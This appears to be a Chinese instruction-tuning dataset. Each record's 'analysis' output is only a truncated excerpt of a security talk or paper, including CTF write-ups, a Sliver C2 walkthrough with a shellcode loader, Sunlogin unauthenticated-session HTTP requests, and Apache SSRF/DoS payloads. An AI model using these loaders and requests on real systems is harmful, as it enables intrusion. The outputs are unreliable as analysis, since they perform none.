{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Humor  Your Adversaries 2 This is how your adversaries envision their DDoS attacks on your webserver: Humor  Your Webserver 3 This is how your webserver will respond after implementing some of the defensive strategies that this talk will cover: Background  Personal  Blake currently works as a senior security architect. He was directly involved with defending against Operation Ababil and has worked to defend SX against various DDoS attacks.  Cisc0ninja works in threat intelligence and has been a long time member of SX.  We both did infosec in the USMC  Disclaimer  Opinions/ideas/solutions are from us and not representative or from our employers.  Some humor images have explicit language in them. 4 What This Speech Will Cover  Requirements (for our examples)  Introduction  Why this talk is relevant  What this talk is  What this talk is not  Attack Landscape  Attacks from Operation Ababil and SX  Network Defense and Monitoring  Tools and techniques to provide defense and monitoring on the network  Web Defense and Detection  Tools and techniques to provide defense and detection on the webserver  Reacting to an Attack  How to handle DDoS when your organization is under fire  Story Time  Stories of attacks against SX and the aftermath 5 Requirements  What do you need for our examples?  Linux/Unix  Apache2  Python and Perl  Raspberry Pi  16x2 LCD for RoboAmp  Snort  Inline if possible  Network sniffer  Hardware if possible  Critical thinking skills  Were trying to teach you how to adapt your defenses as the attackers improve their offensive capabilities 6  Why this talk is relevant  Layer 7 (Application) DDoS attacks have been on the rise since at least 2010. Operation Ababil was low in technical complexity, but had a major impact on the financial sector.  DDoS one of the preferred methods by hacktivists as a form of protest  What about CloudFlare/Prolexic/etc  Cost  Security through obscurity (only as secure as your IP address) for non BGP based solutions  Web sites oft", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefeating Physical Intrusion Detection Alarm Wires Bill Graydon @access_ctrl b.graydon@ggrsecurity.com github.com/bgraydon This is a talk about sensor communication wires.  Alarm systems and access control first  Defeating line supervision and end-of-line resistors  Surrogate Resistor  Voltage Regulation  Defenses Go try it in the Lock Bypass Village! https://www.bypassvillage.org/games/alarm_wire/ Alarm Zones Zone 1 - NC Zone 2 - NC Zone 3 - NO Pick the lock Unscrew the enclosure casing and jumper out the lines Blue team: put the keyswitch on the secure side of the door; use a lock of equal or higher security as the door; install a tamper switch. Red Team Attacks - Binary Sensor Comms Lines - Normally Closed Switch open - controller sees high impedance - alarm Switch closed - controller sees low impedance - no alarm Switch open, line jumpered - controller sees low impedance - no alarm Red Team Attacks - Binary Sensor Comms Lines - Normally Open Switch open - controller sees high impedance - no alarm Switch closed - controller sees low impedance - alarm Switch closed, line cut - controller sees high impedance - no alarm Blue Team Defense - Binary Sensor Comms Lines Vulnerable - put voltage across line, listen for high / low impedance Less vulnerable - put voltage across line, listen for impedance in range Switch between two different resistances (wire one series, one parallel) R1 R2 Best - encrypted digital line with DOS detection heartbeats EOLR End-of-line Resistors Two Approaches 1) Surrogate Resistor 2) Voltage Regulation Resistor Review (Slide 1 of 3) R (Ω, kΩ) I (A, mA) V (V) R = V I Resistor Review (Slide 2 of 3) Requivalent = R1 + R2 R1 R2 Resistor Review (Slide 3 of 3) R1 R2 Requivalent = R1 + R2 1 1 1 R1 R1||R2 = R1 R2 How does the controller measure resistance? R1 R1||R2 A R1 R1||R2 V Rint Special case: open circuit (line cut) A V Rint Special case: short circuit (line jumpered) A V Rint E.g. Honeywell V 2.8kΩ 2kΩ 12V 5V normal, 12V alarm Attacking the EO", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n离线安装windbg preview 因为近期的些作问题重新上了宇宙第调试器 windbg 但是我是windows server的ECS环境没法从微软商店安装 windbg preview 所以只能暂时安装 windbg  都是视觉动物看着丑陋的 windbg 我陷了沉思决定研究下怎么离线安装 wind bg preview  下就是我找到的安装法 找到 windbg preview 的微软商店安装: https://apps.microsoft.com/store/detail/wi ndbg-preview/9PGJGD53TN86?hl=zh-hk&gl=HK 然后将这个URL放在站 https://store.rg-adguard.net/ 上进解析解析出安装包的地 址 看到解析出来的 appx 后缀的件就是安装包copy下载地址后使powershell进安 装 接下来就看到已经安装成功看起来真舒服 # 下载安装包 PS C:\\Users\\Administrator\\Desktop> Invoke-WebRequest 'http://tlu.dl.delivery.mp.microsoft.com/filestreamings ervice/files/978feae8-9dfb-448a-af1a-f85fa96fd5ab? P1=1658971914&P2=404&P3=2&P4=j21fqtjctMAIZuAGmX1bFOHKmo2 AuSBnK8H4GKqFYqcAHmZ14Y3bpEiKp1FYwXkaAkiz%2fC7TQy2EF6kpY WJuyg%3d%3d' -OutFile .\\windbg.appx ## 安装 Add-AppPackage -Path .\\windbg.appx 1 2 3 4 5", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# PostgreSQL > shodan : \"port:5432 PostgreSQL\" > fofa : app=\"PostgreSQL **注入** - [PostgreSQL数据库注入笔记](../../Web安全/Web_Generic/SQLi.md#PostgreSQL) **通过 docker 搭建环境** ```bash wget -O f8x-dev https://f8x.io/dev bash f8x-dev -postgres ``` **相关文章** - [渗透中利用postgresql getshell](https://jianfensec.com/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E6%B8%97%E9%80%8F%E4%B8%AD%E5%88%A9%E7%94%A8postgresql%20getshell/) - https://github.com/safe6Sec/PentestDB/blob/master/PostgreSQL.md - https://github.com/nixawk/pentest-wiki/blob/master/2.Vulnerability-Assessment/Database-Assessment/postgresql/postgresql_hacking.md - [A Penetration Testers Guide to PostgreSQL by David Hayter](https://hakin9.org/a-penetration-testers-guide-to-postgresql/) - [Hacking PostgreSQL](https://tttang.com/archive/854/) - [PL/Python安装和使用](https://valleylord.github.io/post/201410-postgres-plpython-install/) - [PostgreSQL for red teams](https://www.unix-ninja.com/p/postgresql_for_red_teams) - [SQL INJECTION AND POSTGRES - AN ADVENTURE TO EVENTUAL RCE](https://pulsesecurity.co.nz/articles/postgres-sqli) - https://book.hacktricks.xyz/pentesting/pentesting-postgresql - https://github.com/nixawk/pentest-wiki/blob/master/2.Vulnerability-Assessment/Database-Assessment/postgresql/postgresql_hacking.md - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md - [数据库从注入到提权的全家桶套餐](https://www.freebuf.com/articles/database/270106.html) - [Postgresql 渗透总结](https://tttang.com/archive/1547/) **相关案例** - [实战案例针对某系统postgresql注入](https://mp.weixin.qq.com/s/I5hDjIEzn0rKA9aCZsJw9w) - [记一次pgsql数据库漏洞利用](https://xz.aliyun.com/t/10202) - [Postgresql Superuser SQL注入 RCE之旅](https://www.yulegeyu.com/2020/11/16/Postgresql-Superuser-SQL%E6%B3%A8%E5%85%A5-RCE%E4%B9%8B%E6%97%85/) - [又记一次安服仔薅洞实战-未授权之发现postgresql注入](https://forum.butian.net/share/1344) - [Wiz Research discovers \"ExtraReplica\" a cross-account database vulnerability in Azure PostgreSQL](https://www.wiz.io/blog/wiz-research-discovers-ext", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n关于某EDR多处RCE漏洞的简单分析 RCE_1 漏洞件 1. tool\\log\\c.php 通过URL传参初始化变量经典的变量覆盖漏洞 Y4er ChaBug 昨天 RCE_2 1. tool\\php_cli.php 同样的问题感觉这个更过分了bypass waf webshell RCE_3 1. tool\\ldb_cli.php 同 RCE_4? 1. tool\\mdd_sql.php 任意件读取 1. store\\cat.php 算了家都看得懂 啊这 算了不看了", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1\" Breaking WingOS IOActive, Inc. Copyright 2018. All Rights Reserved. Index  Intro to WingOS.  Scenarios & Attack surface.  Vulnerabilities.  Exploitation & Demo.  Conclusions IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS  Embedded Linux OS with proprietary modifications in Kernel.  Created by Motorola. Now property of Extreme networks.  Architecture Mips N32.  Used mainly in Wireless AP and Controllers.  No public information or previous research about its internals. IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS  Web interface. IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS  CLI. IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS  Devices using WingOS (Extreme networks): IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS  Devices using WingOS:  Motorola devices and Zebra devices. IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS  Devices using WingOS: IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS  Devices using WingOS (Kontron for aircrafts): IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS  Where you can find these devices? - Widely used in aircrafts by many airlines around the world. IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS https://techworld.idg.se/2.2524/1.644569/wifi-flygplan/sida/2/sida-2 IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS EN website and case studies you can see that these devices are used in: - Smart buildings and Smart cities. - Healthcare. - Government. - Small and big enterprise networks. - Education. - Retail, Stadiums. -  IOActive, Inc. Copyright 2018. All Rights Reserved. https://transitwireless.com/wp-content/uploads/2016/04/Motorola-Case-Study-New-York-City-Transit.pdf IOActive, Inc. Copyright 2018. All Rights Reserved. IOActive, Inc. Copyright 2018. All Rights Reserved", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEXTRACTING CNG TLS/SSL ARTIFACTS FROM LSASS MEMORY Jake Kambic 2016 Defcon ii TABLE OF CONTENTS Page LIST OF TABLES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . iv LIST OF FIGURES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v LIST OF ACRONYMS & ABBREVIATIONS . . . . . . . . . . . . . . . . . vii LIST OF TERMS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ix CHAPTER 1. INTRODUCTION . . . . . . . . . . . . . . . . . . . . . . . . 1 1.1 Statement of Problem . . . . . . . . . . . . . . . . . . . . . . . . . 2 1.2 Significance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 1.3 Research Question . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 1.4 Hypothesis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 1.5 Assumptions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 1.6 Limitations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 1.7 Delimitations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 CHAPTER 2. RELEVANT LITERATURE . . . . . . . . . . . . . . . . . . 7 2.1 Volatile Memory Analysis Frameworks . . . . . . . . . . . . . . . . 8 2.2 Secure Socket Layer (SSL) & Transport Layer Security (TLS) . . . 10 2.2.1 Handshake & Key Exchange . . . . . . . . . . . . . . . . . . 11 2.2.2 Perfect Forward Secrecy . . . . . . . . . . . . . . . . . . . . 14 2.2.3 Key Calculation . . . . . . . . . . . . . . . . . . . . . . . . . 16 2.2.4 Session Resumption . . . . . . . . . . . . . . . . . . . . . . . 17 2.3 Windows Internals . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 2.3.1 Memory Management . . . . . . . . . . . . . . . . . . . . . . 21 2.3.1.1 Virtual Address Space . . . . . . . . . . . . . . . . 22 2.3.1.2 Virtual Memory Allocation . . . . . . . . . . . . . 24 2.3.2 TLS Implementation . . . . . . . . . . . . . . . . . . . . . . 24 2.3.2.1 DPAPI . . . . . . . . . . . . . . . . . . . . . . . . 25 2.3.2.2 Key Isolation . . . . . .", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npackage com.vulhub.authzvuln; import org.springframework.stereotype.Controller; import org.springframework.boot.web.servlet.error.ErrorController; import org.springframework.web.bind.annotation.RequestMapping; import javax.servlet.http.HttpServletRequest; import org.springframework.http.HttpStatus; import javax.servlet.RequestDispatcher; @Controller public class MyErrorController implements ErrorController { @RequestMapping(\"/error\") public String handleError(HttpServletRequest request) { Object status = request.getAttribute(RequestDispatcher.ERROR_STATUS_CODE); if (status != null) { Integer statusCode = Integer.valueOf(status.toString()); if(statusCode == HttpStatus.FORBIDDEN.value()) { return \"error-403\"; } } return \"error\"; } }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Ocean of sockets (forensics, 200p) In the task we get a binary which I think was packed with UPX, but with renamed sections. Once you fix those, you can unpack it via UPX and get [binary](OceanOfSockets.exe). This is actually pyinstaller executable, so we can unpack this using https://github.com/countercept/python-exe-unpacker and we finally get the [real code](oceanOfSockets.py). This code doesn't seem very interesting, it just sends GET requests to host we provide. The only interesting part is the cookie: `%|r%uL5bbA0F?5bC0E9b0_4b2?N` If we XOR this cookie with known flag format `TMCTF{` we get back `713131713337` when hexencode the data. This doesn't seem very random, but XOR was a wrong approach here. If we try to see how much the characters in the cookie differ from the flag format: ```python s = '%|r%uL5bbA0F?5bC0E9b0_4b2?N' for c in zip(s, \"TMCTF{\"): print(ord(c[0]) - ord(c[1])) ``` We get either 47 or -47. This means we've got a Caesar with shift of 47. It's wrapping around at ` ` so we can just do: ```python for character in cookie: number = ord(character) if number - 47 < ord(' '): number += 47 else: number -= 47 result += chr(number) print(result) ``` And we get `TMCTF{d33p_und3r_th3_0c3an}`", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n了解完基本流程后为了更加了解TP框架还需要了解下数据的传递主要涉及的类为Db Query Connection等 我们借助一句原生查询来了解数据库传递的过程在index Controller中写入这样一句 Db::query(\"select * from think_user where status=1\"); 当我第一次去Db类中看时没有找到query方法只找到了一大段注释 这时我们可以下断点来分析 首先我们进入了Db类的__callStatic方法当一个控制器调用了不存在的方法时这个魔术 方法就会被调用 里面调用了call_user_func_array方法 可以很明显的看到第一个参数是一个数组那么也 就是调用了self::connect()返回对象的method方法 可以看下此时的参数情况 $method为 我们语句中的query方法args就是我们执行的sql语句了 现在只要弄清楚self::connect() 的返回即可它会返回一个对象 参数为数据库连接对象实 例 首先看self::$connection的赋值过程它是一个Connection对象实例 调用了Connection的instance方法 参数其实为config 可以看到根据事先定义好的type 来决定选用哪个数据库 进行数据连接默认为Mysql 说明一点Connector中的类都继承了Connection类 然后看一下这时的调用栈因为Mysql类继承了Connection类所以实例化时也会调用 Connection的构造方法 跟进Connection的construct方法它的参数只有一个config不过这也够了 这一步就是Connection的初始化 此时我们解决了self::$connection 接下来看$query $query的值为\"\\think\\db\\Query\" 说明self::connect()方法最后会返回一 个Query类 所以最后call_user_func_array调用的即是Query类的query方法 到此 分析结束 经过这个分析我们遇到了Db类 Connection类 Query类在这里说明下这几个类 首先Db类 数据库操作的入口类这个类很简单主要就一个connect方法根据config参数连接数据 库注意这里的连接并非真正实现连接只是做好连接前的一些参数准备只有在实际查询 的时候才会连接数据库真正的连接在Connection类的connection方法中 find() 等函数会触发实际查询 Db类都是静态方法调用但看起来这个类啥都没实现那是怎么操作数据库的呢其实就 是封装了数据库操作方法的静态调用利用__callStatic方法 理论上来说框架并不依赖Db类该类的存在只是为了简化数据库抽象层的操作而提供的 一个工厂类否则你就需要单独实例化不同的数据库连接类关键还是这里的代码 所有的数据库操作都是经过Db类调用并且Db类是一个静态类但Db类自身只有一个公 共方法connect 注:一下文章参考自 https://www.kancloud.cn/thinkphp/master-database-and- model/265552 连接器类 Connection 连接类的主要作用就是连接具体的数据库以及完成基本的数据库底层操作包括对分布 式存储过程和事务的完善处理而更多的数据操作则交由查询类完成而更多的数据操作则 交由查询类完成 连接器类有如下子类 如果是仅仅使用原生SQL查询的话只需要使用连接类就可以了通过调用Db类完成 连接器类的作用小结 连接数据库 获取数据表和字段信息 基础查询原生查询 事务支持 分布式支持 查询器类Query 链式查询的主要支持者 除了基础的原生查询可以在连接类完成之外其它的查询操作都是调用查询类的方法查询 类内完成了数据访问层最重要的工作衔接了连接类和生成类统一了数据库的查询用法 所以查询类是不需要单独驱动配合的我们也称之为查询器无论采用什么数据库我们的 查询方式是统一的因为数据访问层核心只有一个唯一的查询类think\\db\\Query Query类封装了所有的数据库CURD方法的优雅实现包括链式方法及各种查询并自动使 用了PDO参数绑定参数自动绑定是在生成器类解析生成SQL时完成最大程度地保护 你的程序避免受数据库注入攻击查询操作会调用生成类生成对应数据库的SQL语句然后 再调用连接类提供的底层原生查询方法执行最终的数据库查询操作 所有的数据库查询都使用了PDO的预处理和参数绑定机制你所看到的大部分数据库方法 都来自于查询类而并非Db类这一点很关键也就是说虽然我们始终使用Db类操作数据 库而实际上大部分方法都是由查询器类提供的方法 生成器类Builder 生成类的作用是接收Query类的所有查询参数", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Where am I Misc, 100 points ## Description: > What is the name of the city where the server for tamuctf.com is located? > > (Not in standard gigem{flag} format) ## Solution: We can use a service such as `iplocation.com` to determine the location of the server. ```console root@kali:/media/sf_CTFs/tamu/Where_am_I# curl \"https://iplocation.com/\" --data \"ip=$(host tamuctf.com | awk '/has address/ { print $4 }')\" {\"city\":\"Boardman\",\"company\":\"Amazon.com\",\"continent_code\":\"NA\",\"country_code\":\"US\",\"country_name\":\"United States\",\"found\":1,\"ip\":\"52.33.57.247\",\"ip_header\":\"IP address\",\"isp\":\"Amazon.com\",\"lat\":45.8491,\"lng\":-119.7143,\"metro_code\":810,\"postal_code\":\"97818\",\"region\":\"OR\",\"region_name\":\"Oregon\",\"time_zone\":\"America\\/Los_Angeles\"} ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\napache 0x00 apachercepayloaddos 0x01 ProxyRequests On GET http://www.baidu.com HTTP/1.1 apache unix socket 48payload GET unix:/A*4096/aaa|http://www.baidu.com HTTP/1.1 48unix socket unix payload GET unix:/A*4096/aaa|aaa HTTP/1.1 httpd 0x02 coredumpapache coredump apachecoredump 1. ulimit -S -c unlimited 2. apache CoreDumpDirectory /var/apache_coredump 3. chown /var/apache_coredump apache anywaycoredump gdb httpd coredumpfilepath gdbbt proxy_util.c1746ap_proxy_get_worker_exstrchr strchrurlnullstrchr ap_proxy_de_socketfy unix:/dddd| strchrcNULLNULLNULLstrchr doshttpdhttpdfork 48ssrfdosssrfdos 0x03 ssrfrewrite RewriteRule /(.*) unix:/path|fcgi://localhost/$1 [P] ssrfrewrite unixunixsocketpathlimit nullnull notesudspathNULLelse elseworker->s->uds_pathnullworker ProxyPass xxxx worker worker", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nsliver 简单使及源码浅析 1 sliver 简单使及源码浅析 作者 https://github.com/Ciyfly 因笔者技术能有限 有些地有些错误欢迎各位师傅指出 也欢迎各位师傅有任何问题跟我交流沟通 录 @Recar 录 简单使 先启动个监听器 成植端 exe 上线 临时退出当前会话 后台 成shellcode bin 开启多模式 成连接配置 客户端 客户端连接 server 服务端 server main console.Start() 服务端开启多模式通信 multiplayer 开启多模式 成连接配置 client 客户端 implant 植端 截图 sliver 植端 main函数 受害机环境执限制检测 beacon模式 session模式 beacon与session模式区别 beacon怎么成 http beacon mtls beacon wgBeacon dns beacon renderSliverGoCode 模板代码成go件 shellcode怎么成的 进程迁移怎么实现的 DLL Hijack 分阶段与阶段的stager有啥区别 些可以抄的代码 获取根程序录 单独给个 cmd.exec设置环境变量 sliver 简单使及源码浅析 2 简单使 sliver的wiki https://github.com/BishopFox/sliver/wiki 先启动个监听器 成植端 exe 这使http的 他还有 https mls 等监听器 generate -b ip或者域名 -b 可以指定监听的ip或者域名 最后exe会成到当前路径 下载执就会上线 上线 查看 session go原log设置输出格式 判断程序是否被调试 go模板的使 go fallthrough 简单的成随机字符串的式 sliver 简单使及源码浅析 3 进beacon的话是use id 临时退出当前会话 后台 background 成shellcode bin generate -b ip/domain -f shellcode sliver 简单使及源码浅析 4 怎么加载这段shellcode呢 这有代码可以直接 申请内存 写 call后可以直接调sliver那边可以看到直接就上线了 func Run(shellcodeBeacon []byte) { addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcodeBeacon)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) // 为shellcode申请内存空间 _, _, _ = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcodeBeacon[0])), uintptr(len(shellcodeBeacon))) // 将shellcode内存复制到申 syscall.Syscall(addr, 0, 0, 0, 0) } 开启多模式 sliver > multiplayer -l 8081 这个多模式的通信式是grpc 成连接配置 [server] sliver > new-operator -l ip -p port-n test [*] Generating new client certificate, please wait ... [*] Saved new client config to: /root/sliver/test_ip.cfg 客户端 PS D:\\code\\sliver> .\\sliver-client_windows.exe --help Usage: sliver-client [flags] sliver-client [command] Available Commands: help Help about any command import Import a client configuration file sliver 简单使及源码浅析 5 version Print version and exit Flags: -h, --help help for sliver-client Use \"sliver-client [command] --help\" for more information about a command. 客户端连接 要先将服务端成的cfg 下载下来后 然后再直接执客户端 并指定cfg 导命令 .\\sliver-client_windows.exe import .\\test_ip.cfg 然后就可以连接 如果导了多个配置件可以选择连", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents Devils Are in the File Descriptors: It Is Time To Catch Them All Le Wu from Baidu Security Le Wu(@NVamous)  Focus on Android/Linux bug hunting and exploit  Found 200+ vulnerabilities in the last two years  Blackhat Asia 2022 speaker About me 2 Outline  Background  Diving into issues in the fd export operations  Diving into issues in the fd import operations  Conclusion & Future work 3 Introduction to file descriptor An integer in a process Process A fd:0 file ojbect0 file object_n file ojbect1 fd:1 fd:n  read(fd, ), write(fd, ), ioctl(fd, ), mmap(fd, ), close(fd)  Thread1  Thread_M Background  User Space Kernel Space 4 Process A User Space fd:0 file ojbect0 Kernel Space file object_n file ojbect1 fd:1 fd:n   read(fd, ), write(fd, ), ioctl(fd, ), mmap(fd, ), close(fd)  Thread1  Thread_M Background fd_array [0] [1] [n]  NULL  Introduction to file descriptor An integer in a process 5 User Space Kernel space export operation Introduction to file descriptorfd export operation and import operation in kernel import operation Background fd file fd file 6 Process A User Space fd:0 file ojbect0 Kernel Space file object_n file ojbect1 fd:1 fd:n   read(fd, ), write(fd, ), ioctl(fd, ), mmap(fd, ), close(fd)  Thread1  Thread_M Background fd_array [0] [1] [n]   Introduction to file descriptor fd export operation in kernel [x] file object_x fd:x Step1: get an unused fd Step2: fd_array[fd]=file Step3: pass fd to user space 7 Process A User Space fd:0 file ojbect0 Kernel Space file object_n file ojbect1 fd:1 fd:n   read(fd, ), write(fd, ), ioctl(fd, ), mmap(fd, ), close(fd)  Thread1  Thread_M Background fd_array [0] [1] [n]   Introduction to file descriptor fd import operation in kernel fd:x [x] file object_x Step1: file=fd_array[x] Step2: acquire file reference 8 User Space Kernel space file fd Step1:get an unused fd Step2:fd_array[fd]=file Step3:pass the fd to user space Introduction to file descriptorfd export operation and fd import operation Step1:file=fd_", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n测试程序版本为 11.0.0.33162 官网目前只开放12.5版本但是可以遍历下载ID进行下载 001 程序详情 向日葵为C++编写使用UPX3.X加壳故此分析前需要进行脱壳处理github上有UPX项目 可以直接脱 此外向日葵在启动的时候会随机启动一个4W+高位端口具体在 sub_140E0AAE8 可看到 社会孙在视频中有一段疑似session的字符串 根据这段疑似 session 的关键字在向日葵一次正常远程的日志中找到了关键字 CID 002 根据日志找session 随后载入IDA对CID关键字进行搜索 找到3个函数存在CID关键字字符串 sub_140E20938  sub_140E1C954  sub_140E1A1F4 往上跟发现分别对应接口 /cgi-bin/rpc 和 /cgi-bin/login.cgi 其中在函数 sub_140E1C954 对应接口功能 /cgi-bin/rpc 中传入如下参数即可在未授权的 情况下获取到有效session POST /cgi-bin/rpc HTTP/1.1 Host: 10.100.100.5:49670 Proxy-Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: SLRC/11.0.0.33162 (Windows,x64)Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/w ebp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 62 action=verify-haras 在知道被控端的验证码和识别码的情况下传入如下参数可获取到session 在知道主机的帐密的情况下通过 /cgi-bin/login.cgi 接口传入如下参数可获取到session 并返回设备的公网内网地址等信息该接口同时可用作暴力破解 POST /cgi-bin/login.cgi HTTP/1.1 Host: 10.100.100.5:49670 Proxy-Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/w ebp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 52 assist参数拼接导致 我这边没有成功有思路的师傅可以交流下 act=login&username=admin&password=admin&hostname=a 003 RCE-trick POST /assist HTTP/1.1 Host: 10.100.100.5:49496 Proxy-Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/w ebp,image/apng,*/*;q=0.8,application/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nApplied Ca$h Eviction through ATM Exploitation Trey Keown Red Balloon Security New York, USA trey@redballoonsecurity.com Brenda So Red Balloon Security New York, USA brenda@redballoonsecurity.com AbstractAutomated Teller Machines (ATMs) are among the oldest devices to be connected to a network. Despite this, the high barrier to entry for legal reverse engineering efforts has resulted in largescale ATM deployment without the testing that would be expected of machines where the cost of compromise can be measured in the number of bills dispensed. Our research examines retail ATMs from a reverse engineers perspective and details two network-accessible vulnerabilities we discovered as a result  a buffer overflow in the Remote Management System (RMS), and a remote command injection via the eXtensions for Financial Services (XFS) interface. These vulnerabilities can lead to arbitrary code execution and jackpotting, respectively. I. INTRODUCTION While the ATMs owned and operated by banks, financial ATMs, often have a more compelling case to be well-secured, the retail ATMs found scattered across gas stations and con- venience stores are often an offering more focused on getting the price right. One such cost-effective ATM is the Nautilus Hyosung HALO II [1]. Our initial interest in the ATM came by the virtue that, as a computer which dispenses money, it is an attractive platform to use as a base for an information security challenge [2]. Initial work involved creating a payment processor for handling ATM transactions  for this, we developed a server supporting the Triton Standard [3]. Further work involved reverse engineering the ATM itself. This was aided by the availability of a firmware update, a JTAG port that was accessible with hardware modifications, and a lack of signature checking prior to applying full firmware updates. II. INITIAL REVERSE ENGINEERING Our target ATM is based on an architecture reused across a number of the Nautilus Hyosungs other price-conscious ATMs  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTowards a Trusted Immutable Kernel Extension (TIKE) for Self-Healing Systems: a Virtual Machine Approach Julian B. Grizzard, Eric R. Dodson, Gregory J. Conti, John G. Levine, Henry L. Owen Georgia Institute of Technology; Atlanta, Georgia 303320250 Phone: 404.894.2955 Fax: 404.894.9959 Email: grizzard@ece.gatech.edu (presenter) Abstract The conventional method to restore a compromised sys- tem is to wipe the system clean, install from known good media, and patch with the latest updates: a costly, restric- tive, and inefficient method. An alternative method is to monitor the host and restore trust if a compromise occurs. When this method is automated, the system is said to be self-healing. One critical requirement of a self-healing sys- tem is that the self-healing mechanism itself must not be compromised. Our solution to this requirement is a Trusted Immutable Kernel Extension (TIKE) by way of a virtual machine. Using a host operating system as a trusted plat- form, we discuss a self-healing system that uses existing intrusion detection systems and corresponding self-healing mechanisms to automatically heal the guest operating sys- tem once a compromise has occurred. I. Overview The conventional method to recover from a system com- promise is to wipe the system clean and perform a fresh installation. As an alternative, it has been suggested that computers can model the human immune system [1]. Our method is to automatically re-establish trust in the com- promised system or to build a self-healing system. How- ever, in most existing systems the entire state, including the kernel, can be altered to an untrusted state once an at- tacker has gained root-level privileges [2]. Hence, even the self-healing mechanism itself could be compromised. In or- der to further explore the notion of self-healing systems, a core foundation of trust is needed. Our solution is a Trusted Immutable Kernel Extension (TIKE), and we ex- plore this concept with a virtual machine approach. TIKE c", "category": "text_analysis", "source": "security_papers"}
